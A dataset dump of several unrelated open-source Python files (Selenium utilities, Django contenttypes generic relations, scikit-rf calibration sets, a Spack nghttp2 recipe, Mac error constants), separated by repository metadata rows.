arguments.append(self.getParameterValue(self.INPUT_B))
if self.getParameterValue(self.BAND_B):
arguments.append('--B_band ' + self.getParameterValue(self.BAND_B))
if self.getParameterValue(self.INPUT_C):
arguments.append('-C')
arguments.append(self.getParameterValue(self.INPUT_C))
if self.getParameterValue(self.BAND_C):
arguments.append('--C_band ' + self.getParameterValue(self.BAND_C))
if self.getParameterValue(self.INPUT_D):
arguments.append('-D')
arguments.append(self.getParameterValue(self.INPUT_D))
if self.getParameterValue(self.BAND_D):
arguments.append('--D_band ' + self.getParameterValue(self.BAND_D))
if self.getParameterValue(self.INPUT_E):
arguments.append('-E')
arguments.append(self.getParameterValue(self.INPUT_E))
if self.getParameterValue(self.BAND_E):
arguments.append('--E_band ' + self.getParameterValue(self.BAND_E))
if self.getParameterValue(self.INPUT_F):
arguments.append('-F')
arguments.append(self.getParameterValue(self.INPUT_F))
if self.getParameterValue(self.BAND_F):
arguments.append('--F_band ' + self.getParameterValue(self.BAND_F))
arguments.append('--outfile')
arguments.append(out)
if isWindows():
return ['gdal_calc', GdalUtils.escapeAndJoin(arguments)]
else:
return ['gdal_calc.py', GdalUtils.escapeAndJoin(arguments)]
| gpl-2.0 | 7,289,643,383,815,380,000 | 44.166667 | 172 | 0.56049 | false |
dorotan/pythontraining | env/Lib/site-packages/selenium/webdriver/common/utils.py | 3 | 4191 | # Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
The Utils methods.
"""
import socket
from selenium.webdriver.common.keys import Keys
try:
basestring
except NameError:
# Python 3
basestring = str
def free_port():
"""
Determines a free port using sockets.
"""
free_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
free_socket.bind(('0.0.0.0', 0))
free_socket.listen(5)
port = free_socket.getsockname()[1]
free_socket.close()
return port
def find_connectable_ip(host, port=None):
"""Resolve a hostname to an IP, preferring IPv4 addresses.
We prefer IPv4 so that we don't change behavior from previous IPv4-only
implementations, and because some drivers (e.g., FirefoxDriver) do not
support IPv6 connections.
If the optional port number is provided, only IPs that listen on the given
port are considered.
:Args:
- host - A hostname.
- port - Optional port number.
:Returns:
A single IP address, as a string. If any IPv4 address is found, one is
returned. Otherwise, if any IPv6 address is found, one is returned. If
neither, then None is returned.
"""
try:
addrinfos = socket.getaddrinfo(host, None)
except socket.gaierror:
return None
ip = None
for family, _, _, _, sockaddr in addrinfos:
connectable = True
if port:
connectable = is_connectable(port, sockaddr[0])
if connectable and family == socket.AF_INET:
return sockaddr[0]
if connectable and not ip and family == socket.AF_INET6:
ip = sockaddr[0]
return ip
def join_host_port(host, port):
"""Joins a hostname and port together.
This is a minimal implementation intended to cope with IPv6 literals. For
example, _join_host_port('::1', 80) == '[::1]:80'.
:Args:
- host - A hostname.
- port - An integer port.
"""
if ':' in host and not host.startswith('['):
return '[%s]:%d' % (host, port)
return '%s:%d' % (host, port)
def is_connectable(port, host="localhost"):
"""
Tries to connect to the server at port to see if it is running.
:Args:
- port: The port to connect.
"""
socket_ = None
try:
socket_ = socket.create_connection((host, port), 1)
result = True
except socket.error:
result = False
finally:
if socket_:
socket_.close()
return result
def is_url_connectable(port):
"""
Tries to connect to the HTTP server at /status path
and specified port to see if it responds successfully.
:Args:
- port: The port to connect.
"""
try:
from urllib import request as url_request
except ImportError:
import urllib2 as url_request
try:
res = url_request.urlopen("http://127.0.0.1:%s/status" % port)
if res.getcode() == 200:
return True
else:
return False
except:
return False
def keys_to_typing(value):
"""Processes the values that will be typed in the element."""
typing = []
for val in value:
if isinstance(val, Keys):
typing.append(val)
elif isinstance(val, int):
val = str(val)
for i in range(len(val)):
typing.append(val[i])
else:
for i in range(len(val)):
typing.append(val[i])
return typing
| apache-2.0 | -346,764,154,843,182,900 | 26.572368 | 78 | 0.632307 | false |
kapari/django-oscar | src/oscar/apps/catalogue/receivers.py | 60 | 1249 | # -*- coding: utf-8 -*-
from django.conf import settings
if settings.OSCAR_DELETE_IMAGE_FILES:
from oscar.core.loading import get_model
from django.db import models
from django.db.models.signals import post_delete
from sorl import thumbnail
from sorl.thumbnail.helpers import ThumbnailError
ProductImage = get_model('catalogue', 'ProductImage')
Category = get_model('catalogue', 'Category')
def delete_image_files(sender, instance, **kwargs):
"""
Deletes the original image, created thumbnails, and any entries
in sorl's key-value store.
"""
image_fields = (models.ImageField, thumbnail.ImageField)
for field in instance._meta.fields:
if isinstance(field, image_fields):
# Make Django return ImageFieldFile instead of ImageField
fieldfile = getattr(instance, field.name)
try:
thumbnail.delete(fieldfile)
except ThumbnailError:
pass
# connect for all models with ImageFields - add as needed
models_with_images = [ProductImage, Category]
for sender in models_with_images:
post_delete.connect(delete_image_files, sender=sender)
| bsd-3-clause | 5,561,713,570,382,437,000 | 33.694444 | 73 | 0.647718 | false |
willhaines/scikit-rf | skrf/calibration/calibrationSet.py | 10 | 4426 |
'''
.. module:: skrf.calibration.calibrationSet
================================================================
calibrationSet (:mod:`skrf.calibration.calibrationSet`)
================================================================
Contains the CalibrationSet class, and supporting functions
CalibrationSet Class
===============
.. autosummary::
:toctree: generated/
CalibrationSet
'''
from itertools import product, combinations, permutations
from .calibration import Calibration
from ..networkSet import NetworkSet
def cartesian_product(ideals, measured_sets, *args, **kwargs):
'''
'''
measured_lists = product(*[k[:] for k in measured_sets])
return [Calibration(ideals = ideals, measured = measured,
*args, **kwargs) for measured in measured_lists ]
def dot_product(ideals, measured_sets, *args, **kwargs):
'''
'''
for measured_set in measured_sets:
if len(measured_set) != len(measured_sets[0]):
raise(IndexError('all measured NetworkSets must have same length for dot product combinatoric function'))
cal_list = []
for k in list(range(len(measured_sets[0]))):
measured = [measured_set[k] for measured_set in measured_sets]
cal_list.append(
Calibration(ideals=ideals, measured= measured,
*args,**kwargs)
)
return cal_list
class CalibrationSet(object):
'''
A set of Calibrations
This is designed to support experimental uncertainty analysis [1]_.
References
-----------
.. [1] A. Arsenovic, L. Chen, M. F. Bauwens, H. Li, N. S. Barker, and R. M. Weikle, "An Experimental Technique for Calibration Uncertainty Analysis," IEEE Transactions on Microwave Theory and Techniques, vol. 61, no. 1, pp. 263-269, 2013.
'''
def __init__(self, cal_class, ideals, measured_sets,*args, **kwargs):
'''
Parameters
----------
cal_class : a Calibration class
this is the class of calibration to use on the set. This
argument is the actual class itself like OnePort, TRL, SOLT, etc
ideals : list of Networks
measured_set : list of NetworkSets, or list of lists
each element in this list should be a corresponding measured
set to the ideals element of the same index. The sets
themselves can be anything list-like
\\*args\\**kargs :
passed to self.run(),
'''
self.cal_class = cal_class
self.ideals = ideals
self.measured_sets = measured_sets
self.args = args
self.kwargs = kwargs
self.run(*args, **kwargs)
def __getitem__(self, key):
return self.cal_list[key]
def apply_cal(self, raw_ntwk, *args, **kwargs):
'''
'''
return NetworkSet([k.apply_cal(raw_ntwk) for k in self.cal_list],
*args, **kwargs)
def plot_uncertainty_per_standard(self):
'''
'''
self.dankness('std_s','plot_s_mag')
def dankness(self, prop, func, *args, **kwargs):
'''
'''
try:
[k.__getattribute__(prop).__getattribute__(func)\
(*args, **kwargs) for k in self.measured_sets]
except (TypeError):
return [k.__getattribute__(prop).__getattribute__(func) \
for k in self.measured_sets]
def run(self):
NotImplementedError('SubClass must implement this')
@property
def corrected_sets(self):
'''
The set of corrected networks, each is corrected by its corresponding
element in the cal_list
'''
n_meas = len(self.cal_list[0].measured)
mat = [k.caled_ntwks for k in self.cal_list]
return [NetworkSet([k[l] for k in mat]) for l in range(n_meas)]
class Dot(CalibrationSet):
def run(self, *args, **kwargs):
ideals = self.ideals
measured_sets = self.measured_sets
if len(set(map(len, measured_sets))) !=1:
raise(IndexError('all measured NetworkSets must have same length for dot product combinatoric function'))
self.cal_list = []
for k in range(len(measured_sets[0])):
measured = [measured_set[k] for measured_set in measured_sets]
cal = self.cal_class(ideals=ideals, measured= measured,
*args,**kwargs)
self.cal_list.append(cal)
| bsd-3-clause | 6,811,641,914,329,456,000 | 29.524138 | 242 | 0.582241 | false |
matthiasdiener/spack | var/spack/repos/builtin/packages/nghttp2/package.py | 5 | 2319 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Nghttp2(AutotoolsPackage):
"""nghttp2 is an implementation of HTTP/2 and its header compression
algorithm HPACK in C."""
homepage = "https://nghttp2.org/"
url = "https://github.com/nghttp2/nghttp2/releases/download/v1.26.0/nghttp2-1.26.0.tar.gz"
version('1.26.0', '83fa813b22bacbc6ea80dfb24847569f')
depends_on('[email protected]:', type=('build', 'run'))
depends_on('[email protected]:', type=('build', 'run'))
depends_on('py-setuptools', type=('build'))
def setup_environment(self, spack_env, run_env):
site_packages_dir = '/'.join(
[self.spec.prefix.lib,
('python' + str(self.spec['python'].version.up_to(2))),
'site-packages'])
spack_env.prepend_path('PYTHONPATH', site_packages_dir)
@run_before('install')
def ensure_install_dir_exists(self):
site_packages_dir = '/'.join(
[self.spec.prefix.lib,
('python' + str(self.spec['python'].version.up_to(2))),
'site-packages'])
mkdirp(site_packages_dir)
| lgpl-2.1 | 2,025,054,012,411,842,300 | 41.944444 | 99 | 0.6395 | false |
rmboggs/django | django/contrib/contenttypes/fields.py | 21 | 24531 | from __future__ import unicode_literals
from collections import defaultdict
from django.contrib.contenttypes.models import ContentType
from django.core import checks
from django.core.exceptions import FieldDoesNotExist, ObjectDoesNotExist
from django.db import DEFAULT_DB_ALIAS, models, router, transaction
from django.db.models import DO_NOTHING, signals
from django.db.models.base import ModelBase, make_foreign_order_accessors
from django.db.models.fields.related import (
ForeignObject, ForeignObjectRel, ReverseManyToOneDescriptor,
lazy_related_operation,
)
from django.db.models.query_utils import PathInfo
from django.utils.encoding import python_2_unicode_compatible, smart_text
from django.utils.functional import cached_property
@python_2_unicode_compatible
class GenericForeignKey(object):
"""
Provide a generic many-to-one relation through the ``content_type`` and
``object_id`` fields.
This class also doubles as an accessor to the related object (similar to
ForwardManyToOneDescriptor) by adding itself as a model attribute.
"""
# Field flags
auto_created = False
concrete = False
editable = False
hidden = False
is_relation = True
many_to_many = False
many_to_one = True
one_to_many = False
one_to_one = False
related_model = None
remote_field = None
def __init__(self, ct_field='content_type', fk_field='object_id', for_concrete_model=True):
self.ct_field = ct_field
self.fk_field = fk_field
self.for_concrete_model = for_concrete_model
self.editable = False
self.rel = None
self.column = None
def contribute_to_class(self, cls, name, **kwargs):
self.name = name
self.model = cls
self.cache_attr = "_%s_cache" % name
cls._meta.add_field(self, virtual=True)
# Only run pre-initialization field assignment on non-abstract models
if not cls._meta.abstract:
signals.pre_init.connect(self.instance_pre_init, sender=cls)
setattr(cls, name, self)
def get_filter_kwargs_for_object(self, obj):
"""See corresponding method on Field"""
return {
self.fk_field: getattr(obj, self.fk_field),
self.ct_field: getattr(obj, self.ct_field),
}
def get_forward_related_filter(self, obj):
"""See corresponding method on RelatedField"""
return {
self.fk_field: obj.pk,
self.ct_field: ContentType.objects.get_for_model(obj).pk,
}
def __str__(self):
model = self.model
app = model._meta.app_label
return '%s.%s.%s' % (app, model._meta.object_name, self.name)
def check(self, **kwargs):
errors = []
errors.extend(self._check_field_name())
errors.extend(self._check_object_id_field())
errors.extend(self._check_content_type_field())
return errors
def _check_field_name(self):
if self.name.endswith("_"):
return [
checks.Error(
'Field names must not end with an underscore.',
hint=None,
obj=self,
id='fields.E001',
)
]
else:
return []
def _check_object_id_field(self):
try:
self.model._meta.get_field(self.fk_field)
except FieldDoesNotExist:
return [
checks.Error(
"The GenericForeignKey object ID references the non-existent field '%s'." % self.fk_field,
hint=None,
obj=self,
id='contenttypes.E001',
)
]
else:
return []
def _check_content_type_field(self):
"""
Check if field named `field_name` in model `model` exists and is a
valid content_type field (is a ForeignKey to ContentType).
"""
try:
field = self.model._meta.get_field(self.ct_field)
except FieldDoesNotExist:
return [
checks.Error(
"The GenericForeignKey content type references the non-existent field '%s.%s'." % (
self.model._meta.object_name, self.ct_field
),
hint=None,
obj=self,
id='contenttypes.E002',
)
]
else:
if not isinstance(field, models.ForeignKey):
return [
checks.Error(
"'%s.%s' is not a ForeignKey." % (
self.model._meta.object_name, self.ct_field
),
hint=(
"GenericForeignKeys must use a ForeignKey to "
"'contenttypes.ContentType' as the 'content_type' field."
),
obj=self,
id='contenttypes.E003',
)
]
elif field.remote_field.model != ContentType:
return [
checks.Error(
"'%s.%s' is not a ForeignKey to 'contenttypes.ContentType'." % (
self.model._meta.object_name, self.ct_field
),
hint=(
"GenericForeignKeys must use a ForeignKey to "
"'contenttypes.ContentType' as the 'content_type' field."
),
obj=self,
id='contenttypes.E004',
)
]
else:
return []
def instance_pre_init(self, signal, sender, args, kwargs, **_kwargs):
"""
Handle initializing an object with the generic FK instead of
content_type and object_id fields.
"""
if self.name in kwargs:
value = kwargs.pop(self.name)
if value is not None:
kwargs[self.ct_field] = self.get_content_type(obj=value)
kwargs[self.fk_field] = value._get_pk_val()
else:
kwargs[self.ct_field] = None
kwargs[self.fk_field] = None
def get_content_type(self, obj=None, id=None, using=None):
if obj is not None:
return ContentType.objects.db_manager(obj._state.db).get_for_model(
obj, for_concrete_model=self.for_concrete_model)
elif id is not None:
return ContentType.objects.db_manager(using).get_for_id(id)
else:
# This should never happen. I love comments like this, don't you?
raise Exception("Impossible arguments to GFK.get_content_type!")
def get_prefetch_queryset(self, instances, queryset=None):
if queryset is not None:
raise ValueError("Custom queryset can't be used for this lookup.")
# For efficiency, group the instances by content type and then do one
# query per model
fk_dict = defaultdict(set)
# We need one instance for each group in order to get the right db:
instance_dict = {}
ct_attname = self.model._meta.get_field(self.ct_field).get_attname()
for instance in instances:
# We avoid looking for values if either ct_id or fkey value is None
ct_id = getattr(instance, ct_attname)
if ct_id is not None:
fk_val = getattr(instance, self.fk_field)
if fk_val is not None:
fk_dict[ct_id].add(fk_val)
instance_dict[ct_id] = instance
ret_val = []
for ct_id, fkeys in fk_dict.items():
instance = instance_dict[ct_id]
ct = self.get_content_type(id=ct_id, using=instance._state.db)
ret_val.extend(ct.get_all_objects_for_this_type(pk__in=fkeys))
# For doing the join in Python, we have to match both the FK val and the
# content type, so we use a callable that returns a (fk, class) pair.
def gfk_key(obj):
ct_id = getattr(obj, ct_attname)
if ct_id is None:
return None
else:
model = self.get_content_type(id=ct_id,
using=obj._state.db).model_class()
return (model._meta.pk.get_prep_value(getattr(obj, self.fk_field)),
model)
return (ret_val,
lambda obj: (obj._get_pk_val(), obj.__class__),
gfk_key,
True,
self.cache_attr)
def is_cached(self, instance):
return hasattr(instance, self.cache_attr)
def __get__(self, instance, cls=None):
if instance is None:
return self
try:
return getattr(instance, self.cache_attr)
except AttributeError:
rel_obj = None
# Make sure to use ContentType.objects.get_for_id() to ensure that
# lookups are cached (see ticket #5570). This takes more code than
# the naive ``getattr(instance, self.ct_field)``, but has better
# performance when dealing with GFKs in loops and such.
f = self.model._meta.get_field(self.ct_field)
ct_id = getattr(instance, f.get_attname(), None)
if ct_id is not None:
ct = self.get_content_type(id=ct_id, using=instance._state.db)
try:
rel_obj = ct.get_object_for_this_type(pk=getattr(instance, self.fk_field))
except ObjectDoesNotExist:
pass
setattr(instance, self.cache_attr, rel_obj)
return rel_obj
def __set__(self, instance, value):
ct = None
fk = None
if value is not None:
ct = self.get_content_type(obj=value)
fk = value._get_pk_val()
setattr(instance, self.ct_field, ct)
setattr(instance, self.fk_field, fk)
setattr(instance, self.cache_attr, value)
class GenericRel(ForeignObjectRel):
"""
Used by GenericRelation to store information about the relation.
"""
def __init__(self, field, to, related_name=None, related_query_name=None, limit_choices_to=None):
super(GenericRel, self).__init__(
field, to,
related_name=related_query_name or '+',
related_query_name=related_query_name,
limit_choices_to=limit_choices_to,
on_delete=DO_NOTHING,
)
class GenericRelation(ForeignObject):
"""
Provide a reverse to a relation created by a GenericForeignKey.
"""
# Field flags
auto_created = False
many_to_many = False
many_to_one = False
one_to_many = True
one_to_one = False
rel_class = GenericRel
def __init__(self, to, object_id_field='object_id', content_type_field='content_type',
for_concrete_model=True, related_query_name=None, limit_choices_to=None, **kwargs):
kwargs['rel'] = self.rel_class(
self, to,
related_query_name=related_query_name,
limit_choices_to=limit_choices_to,
)
kwargs['blank'] = True
kwargs['on_delete'] = models.CASCADE
kwargs['editable'] = False
kwargs['serialize'] = False
# This construct is somewhat of an abuse of ForeignObject. This field
# represents a relation from pk to object_id field. But, this relation
# isn't direct, the join is generated reverse along foreign key. So,
# the from_field is object_id field, to_field is pk because of the
# reverse join.
super(GenericRelation, self).__init__(
to, from_fields=[object_id_field], to_fields=[], **kwargs)
self.object_id_field_name = object_id_field
self.content_type_field_name = content_type_field
self.for_concrete_model = for_concrete_model
def check(self, **kwargs):
errors = super(GenericRelation, self).check(**kwargs)
errors.extend(self._check_generic_foreign_key_existence())
return errors
def _check_generic_foreign_key_existence(self):
target = self.remote_field.model
if isinstance(target, ModelBase):
fields = target._meta.virtual_fields
if any(isinstance(field, GenericForeignKey) and
field.ct_field == self.content_type_field_name and
field.fk_field == self.object_id_field_name
for field in fields):
return []
else:
return [
checks.Error(
("The GenericRelation defines a relation with the model "
"'%s.%s', but that model does not have a GenericForeignKey.") % (
target._meta.app_label, target._meta.object_name
),
hint=None,
obj=self,
id='contenttypes.E004',
)
]
else:
return []
def resolve_related_fields(self):
self.to_fields = [self.model._meta.pk.name]
return [(self.remote_field.model._meta.get_field(self.object_id_field_name), self.model._meta.pk)]
def get_path_info(self):
opts = self.remote_field.model._meta
target = opts.pk
return [PathInfo(self.model._meta, opts, (target,), self.remote_field, True, False)]
def get_reverse_path_info(self):
opts = self.model._meta
from_opts = self.remote_field.model._meta
return [PathInfo(from_opts, opts, (opts.pk,), self, not self.unique, False)]
def get_choices_default(self):
return super(GenericRelation, self).get_choices(include_blank=False)
def value_to_string(self, obj):
qs = getattr(obj, self.name).all()
return smart_text([instance._get_pk_val() for instance in qs])
def contribute_to_class(self, cls, name, **kwargs):
kwargs['virtual_only'] = True
super(GenericRelation, self).contribute_to_class(cls, name, **kwargs)
self.model = cls
setattr(cls, self.name, ReverseGenericManyToOneDescriptor(self.remote_field))
# Add get_RELATED_order() and set_RELATED_order() methods if the model
# on the other end of this relation is ordered with respect to this.
def matching_gfk(field):
return (
isinstance(field, GenericForeignKey) and
self.content_type_field_name == field.ct_field and
self.object_id_field_name == field.fk_field
)
def make_generic_foreign_order_accessors(related_model, model):
if matching_gfk(model._meta.order_with_respect_to):
make_foreign_order_accessors(model, related_model)
lazy_related_operation(make_generic_foreign_order_accessors, self.model, self.remote_field.model)
def set_attributes_from_rel(self):
pass
def get_internal_type(self):
return "ManyToManyField"
def get_content_type(self):
"""
Return the content type associated with this field's model.
"""
return ContentType.objects.get_for_model(self.model,
for_concrete_model=self.for_concrete_model)
def get_extra_restriction(self, where_class, alias, remote_alias):
field = self.remote_field.model._meta.get_field(self.content_type_field_name)
contenttype_pk = self.get_content_type().pk
cond = where_class()
lookup = field.get_lookup('exact')(field.get_col(remote_alias), contenttype_pk)
cond.add(lookup, 'AND')
return cond
def bulk_related_objects(self, objs, using=DEFAULT_DB_ALIAS):
"""
Return all objects related to ``objs`` via this ``GenericRelation``.
"""
return self.remote_field.model._base_manager.db_manager(using).filter(**{
"%s__pk" % self.content_type_field_name: ContentType.objects.db_manager(using).get_for_model(
self.model, for_concrete_model=self.for_concrete_model).pk,
"%s__in" % self.object_id_field_name: [obj.pk for obj in objs]
})
class ReverseGenericManyToOneDescriptor(ReverseManyToOneDescriptor):
"""
Accessor to the related objects manager on the one-to-many relation created
by GenericRelation.
In the example::
class Post(Model):
comments = GenericRelation(Comment)
``post.comments`` is a ReverseGenericManyToOneDescriptor instance.
"""
@cached_property
def related_manager_cls(self):
return create_generic_related_manager(
self.rel.model._default_manager.__class__,
self.rel,
)
def create_generic_related_manager(superclass, rel):
"""
Factory function to create a manager that subclasses another manager
(generally the default manager of a given model) and adds behaviors
specific to generic relations.
"""
class GenericRelatedObjectManager(superclass):
def __init__(self, instance=None):
super(GenericRelatedObjectManager, self).__init__()
self.instance = instance
self.model = rel.model
content_type = ContentType.objects.db_manager(instance._state.db).get_for_model(
instance, for_concrete_model=rel.field.for_concrete_model)
self.content_type = content_type
self.content_type_field_name = rel.field.content_type_field_name
self.object_id_field_name = rel.field.object_id_field_name
self.prefetch_cache_name = rel.field.attname
self.pk_val = instance._get_pk_val()
self.core_filters = {
'%s__pk' % self.content_type_field_name: content_type.id,
self.object_id_field_name: self.pk_val,
}
def __call__(self, **kwargs):
# We use **kwargs rather than a kwarg argument to enforce the
# `manager='manager_name'` syntax.
manager = getattr(self.model, kwargs.pop('manager'))
manager_class = create_generic_related_manager(manager.__class__, rel)
return manager_class(instance=self.instance)
do_not_call_in_templates = True
def __str__(self):
return repr(self)
def get_queryset(self):
try:
return self.instance._prefetched_objects_cache[self.prefetch_cache_name]
except (AttributeError, KeyError):
db = self._db or router.db_for_read(self.model, instance=self.instance)
return super(GenericRelatedObjectManager, self).get_queryset().using(db).filter(**self.core_filters)
def get_prefetch_queryset(self, instances, queryset=None):
if queryset is None:
queryset = super(GenericRelatedObjectManager, self).get_queryset()
queryset._add_hints(instance=instances[0])
queryset = queryset.using(queryset._db or self._db)
query = {
'%s__pk' % self.content_type_field_name: self.content_type.id,
'%s__in' % self.object_id_field_name: set(obj._get_pk_val() for obj in instances)
}
# We (possibly) need to convert object IDs to the type of the
# instances' PK in order to match up instances:
object_id_converter = instances[0]._meta.pk.to_python
return (queryset.filter(**query),
lambda relobj: object_id_converter(getattr(relobj, self.object_id_field_name)),
lambda obj: obj._get_pk_val(),
False,
self.prefetch_cache_name)
def add(self, *objs, **kwargs):
bulk = kwargs.pop('bulk', True)
db = router.db_for_write(self.model, instance=self.instance)
def check_and_update_obj(obj):
if not isinstance(obj, self.model):
raise TypeError("'%s' instance expected, got %r" % (
self.model._meta.object_name, obj
))
setattr(obj, self.content_type_field_name, self.content_type)
setattr(obj, self.object_id_field_name, self.pk_val)
if bulk:
pks = []
for obj in objs:
if obj._state.adding or obj._state.db != db:
raise ValueError(
"%r instance isn't saved. Use bulk=False or save "
"the object first. but must be." % obj
)
check_and_update_obj(obj)
pks.append(obj.pk)
self.model._base_manager.using(db).filter(pk__in=pks).update(**{
self.content_type_field_name: self.content_type,
self.object_id_field_name: self.pk_val,
})
else:
with transaction.atomic(using=db, savepoint=False):
for obj in objs:
check_and_update_obj(obj)
obj.save()
add.alters_data = True
def remove(self, *objs, **kwargs):
if not objs:
return
bulk = kwargs.pop('bulk', True)
self._clear(self.filter(pk__in=[o.pk for o in objs]), bulk)
remove.alters_data = True
def clear(self, **kwargs):
bulk = kwargs.pop('bulk', True)
self._clear(self, bulk)
clear.alters_data = True
def _clear(self, queryset, bulk):
db = router.db_for_write(self.model, instance=self.instance)
queryset = queryset.using(db)
if bulk:
# `QuerySet.delete()` creates its own atomic block which
# contains the `pre_delete` and `post_delete` signal handlers.
queryset.delete()
else:
with transaction.atomic(using=db, savepoint=False):
for obj in queryset:
obj.delete()
_clear.alters_data = True
def set(self, objs, **kwargs):
# Force evaluation of `objs` in case it's a queryset whose value
# could be affected by `manager.clear()`. Refs #19816.
objs = tuple(objs)
bulk = kwargs.pop('bulk', True)
clear = kwargs.pop('clear', False)
db = router.db_for_write(self.model, instance=self.instance)
with transaction.atomic(using=db, savepoint=False):
if clear:
self.clear()
self.add(*objs, bulk=bulk)
else:
old_objs = set(self.using(db).all())
new_objs = []
for obj in objs:
if obj in old_objs:
old_objs.remove(obj)
else:
new_objs.append(obj)
self.remove(*old_objs)
self.add(*new_objs, bulk=bulk)
set.alters_data = True
def create(self, **kwargs):
kwargs[self.content_type_field_name] = self.content_type
kwargs[self.object_id_field_name] = self.pk_val
db = router.db_for_write(self.model, instance=self.instance)
return super(GenericRelatedObjectManager, self).using(db).create(**kwargs)
create.alters_data = True
def get_or_create(self, **kwargs):
kwargs[self.content_type_field_name] = self.content_type
kwargs[self.object_id_field_name] = self.pk_val
db = router.db_for_write(self.model, instance=self.instance)
return super(GenericRelatedObjectManager, self).using(db).get_or_create(**kwargs)
get_or_create.alters_data = True
def update_or_create(self, **kwargs):
kwargs[self.content_type_field_name] = self.content_type
kwargs[self.object_id_field_name] = self.pk_val
db = router.db_for_write(self.model, instance=self.instance)
return super(GenericRelatedObjectManager, self).using(db).update_or_create(**kwargs)
update_or_create.alters_data = True
return GenericRelatedObjectManager
| bsd-3-clause | -623,779,507,485,694,100 | 38.186901 | 116 | 0.56023 | false |
gameduell/duell | bin/mac/python2.7.9/lib/python2.7/plat-mac/macerrors.py | 40 | 116661 | # -coding=latin1-
from warnings import warnpy3k
warnpy3k("In 3.x, the macerrors module is removed.", stacklevel=2)
svTempDisable = -32768 #svTempDisable
svDisabled = -32640 #Reserve range -32640 to -32768 for Apple temp disables.
fontNotOutlineErr = -32615 #bitmap font passed to routine that does outlines only
kURL68kNotSupportedError = -30788 #kURL68kNotSupportedError
kURLAccessNotAvailableError = -30787 #kURLAccessNotAvailableError
kURLInvalidConfigurationError = -30786 #kURLInvalidConfigurationError
kURLExtensionFailureError = -30785 #kURLExtensionFailureError
kURLFileEmptyError = -30783 #kURLFileEmptyError
kURLInvalidCallError = -30781 #kURLInvalidCallError
kURLUnsettablePropertyError = -30780 #kURLUnsettablePropertyError
kURLPropertyBufferTooSmallError = -30779 #kURLPropertyBufferTooSmallError
kURLUnknownPropertyError = -30778 #kURLUnknownPropertyError
kURLPropertyNotYetKnownError = -30777 #kURLPropertyNotYetKnownError
kURLAuthenticationError = -30776 #kURLAuthenticationError
kURLServerBusyError = -30775 #kURLServerBusyError
kURLUnsupportedSchemeError = -30774 #kURLUnsupportedSchemeError
kURLInvalidURLError = -30773 #kURLInvalidURLError
kURLDestinationExistsError = -30772 #kURLDestinationExistsError
kURLProgressAlreadyDisplayedError = -30771 #kURLProgressAlreadyDisplayedError
kURLInvalidURLReferenceError = -30770 #kURLInvalidURLReferenceError
controlHandleInvalidErr = -30599 #controlHandleInvalidErr
controlInvalidDataVersionErr = -30597 #controlInvalidDataVersionErr
errItemNotControl = -30596 #errItemNotControl
errCantEmbedRoot = -30595 #errCantEmbedRoot
errCantEmbedIntoSelf = -30594 #errCantEmbedIntoSelf
errWindowRegionCodeInvalid = -30593 #errWindowRegionCodeInvalid
errControlHiddenOrDisabled = -30592 #errControlHiddenOrDisabled
errDataSizeMismatch = -30591 #errDataSizeMismatch
errControlIsNotEmbedder = -30590 #errControlIsNotEmbedder
errControlsAlreadyExist = -30589 #errControlsAlreadyExist
errInvalidPartCode = -30588 #errInvalidPartCode
errRootAlreadyExists = -30587 #errRootAlreadyExists
errNoRootControl = -30586 #errNoRootControl
errCouldntSetFocus = -30585 #errCouldntSetFocus
errUnknownControl = -30584 #errUnknownControl
errWindowDoesntSupportFocus = -30583 #errWindowDoesntSupportFocus
errControlDoesntSupportFocus = -30582 #errControlDoesntSupportFocus
errDataNotSupported = -30581 #errDataNotSupported
errMessageNotSupported = -30580 #errMessageNotSupported
themeMonitorDepthNotSupportedErr = -30567 #theme not supported at monitor depth
themeScriptFontNotFoundErr = -30566 #theme font requested for uninstalled script system
themeBadCursorIndexErr = -30565 #themeBadCursorIndexErr
themeHasNoAccentsErr = -30564 #themeHasNoAccentsErr
themeBadTextColorErr = -30563 #themeBadTextColorErr
themeProcessNotRegisteredErr = -30562 #themeProcessNotRegisteredErr
themeProcessRegisteredErr = -30561 #themeProcessRegisteredErr
themeInvalidBrushErr = -30560 #pattern index invalid
qtvrUninitialized = -30555 #qtvrUninitialized
qtvrLibraryLoadErr = -30554 #qtvrLibraryLoadErr
streamingNodeNotReadyErr = -30553 #streamingNodeNotReadyErr
noMemoryNodeFailedInitialize = -30552 #noMemoryNodeFailedInitialize
invalidHotSpotIDErr = -30551 #invalidHotSpotIDErr
invalidNodeFormatErr = -30550 #invalidNodeFormatErr
limitReachedErr = -30549 #limitReachedErr
settingNotSupportedByNodeErr = -30548 #settingNotSupportedByNodeErr
propertyNotSupportedByNodeErr = -30547 #propertyNotSupportedByNodeErr
timeNotInViewErr = -30546 #timeNotInViewErr
invalidViewStateErr = -30545 #invalidViewStateErr
invalidNodeIDErr = -30544 #invalidNodeIDErr
selectorNotSupportedByNodeErr = -30543 #selectorNotSupportedByNodeErr
callNotSupportedByNodeErr = -30542 #callNotSupportedByNodeErr
constraintReachedErr = -30541 #constraintReachedErr
notAQTVRMovieErr = -30540 #notAQTVRMovieErr
kFBCnoSuchHit = -30532 #kFBCnoSuchHit
